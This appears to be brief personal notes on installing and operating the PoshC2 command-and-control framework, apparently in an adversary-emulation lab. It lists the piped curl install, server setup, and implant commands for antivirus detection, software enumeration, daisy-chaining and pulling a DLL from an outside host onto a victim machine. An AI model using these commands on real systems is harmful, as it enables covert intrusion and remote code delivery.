PoshC2
PoshC2 is pretty well documented, below are my notes. Best to use the official documentation: https://poshc2.readthedocs.io/en/latest/
sudo su -
curl -sSL https://raw.githubusercontent.com/nettitude/PoshC2/master/Install.sh | bash
sudo su -
cd /opt/PoshC2
posh-project -n test
posh-config
Modify the values in the file, consider: BindIP; PayloadCommsHost; UserAgent
sudo su -
posh-server
On launch, PoshC2 generates a number of payloads into /opt/PoshC2_Project and creates a quick start file.
cat /opt/PoshC2_Project/quickstart.txt
sudo su -
posh -u georgy
Use the multitude of methods to deploy the agent from the quickstart.txt file.
loadmodule /home/slingshot/CozyBear/stepTwelve.ps1
detectav
software
Run the following command from the implant you want to use as the daisy server.
startdaisy
web-upload-file -from 'https://mint.scythedemo.com/ServiceLogin?passive=Gc5H5HZdakKD8ZWuaUcX2Q&b=true' -to 'C:\Users\Jorge\Desktop\scythe.dll'
Last modified 2yr ago